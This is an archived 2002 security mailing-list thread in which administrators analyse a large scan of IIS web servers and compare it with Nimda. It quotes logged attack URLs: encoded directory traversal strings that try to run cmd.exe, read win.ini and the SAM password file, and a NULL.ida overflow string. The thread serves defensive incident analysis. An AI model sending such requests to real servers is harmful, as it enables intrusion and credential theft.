Hi Folks, I noticed a large, noisy scan on June 9, 2002 that has similarities with Tina's. We were hit with 504 scans on one server, 53,903 scans for our domain, all from one IP. I've got the log from one of the servers and it contains a remarkable number of signatures in addition to the sam scans that Tina noticed. I did not notice the *.cif string. Here are only a few of the strings. (I can't predict how the lines will wrap...) /galaxy_8681.9027 /_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir /a.asp/..%c0%2f../..%c0%2f../winnt/win.ini /a.asp/..%c0%2f../..%c0%2f..\winnt\repair\sam._ /adsamples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir /bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir /bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir /a.asp/..%%35%63../..%%35%63..\winnt\repair\sam._ /_vti_cnf/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir /NULL.printer /NULL.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=a I'd be glad to forward the full log fragment if anyone's interested. Regards, Lew Wolfgang On Tue, 11 Jun 2002, Jay D. Dyson wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On Tue, 11 Jun 2002, Sweth Chandramouli wrote: > > > > Here's what I'm seeing -- anyone have any information on this variant? > > > /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\\*.cif/s/b > > > /a.asp/..%c1%1c../..%c1%1c../winnt/repair/sam > > > /a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam > > > > > > This is definitely not Nimda, although it attempts to exploit the same > > > directory traversal vulnerability in IIS as Nimda > > > > Perhaps this should be thrown over to the incidents list? > > I concur. Incidents folks, here's a summary of the present > discussion from the Log Analysis list. > > 1. Tina Bird requested a list of Nimda variant attack strings > (which I provided). Upon review, she determined that the > style of attacks she was seeing (enumerated at the top of > this message) were not among the known Nimda variants. > > 2. Michael Katz made the observation that the directory > traversal technique is the same as Nimda, though the > attacks don't appear as a Nimda variant. Mr. Katz > further suggested that the attacks may have been manually > executed. > > 3. Sweth Chandramouli commented on the '.cif' request thus: > "This is the one that scares me; it's attempting to run a > recursive directory search on your C drive to find your > Internet Explorer component information file--the file > that, for example, Windows Update uses to determine what > patches you have installed. Presumably, if that request > succeeded, it would then download the CIF to find out what > version of IE you have, etc., and try only those exploits > of relevance." > > 4. Both Sweth and myself noted that the traversal to /winnt/ > repair/sam had some large ramifications if the file access > attempt wasn't hung up with some sort of Microsoft access > sharing violation. (The attacker would basically have a > load of goodies to feed l0phtcrack.) > > Anyone else seeing this pop up in their logs? Any honeypots > collecting data of this sort? It's a new one on me. > > - -Jay > > ( ( _______ > )) )) .--"There's always time for a good cup of coffee"--. >====<--. > C|~~|C|~~| (>------ Jay D. Dyson -- jdysonat_private ------<) | = |-' > `--' `--' `-- I'll be diplomatic...when I run out of ammo. --' `------' > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.7 (TreacherOS) > Comment: See http://www.treachery.net/~jdyson/ for current keys. > > iD8DBQE9BpC5GI2IHblM+8ERAukTAJ4yysPYcDmnBzSkMvMA8+w+PaoGtACfetJk > hE4GalTiNp/d0VcmfOhyUqE= > =oCYX > -----END PGP SIGNATURE----- > > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > --------------------------------------------------------------------- To unsubscribe, e-mail: loganalysis-unsubscribeat_private For additional commands, e-mail: loganalysis-helpat_private
This archive was generated by hypermail 2b30 : Wed Jun 12 2002 - 22:06:44 PDT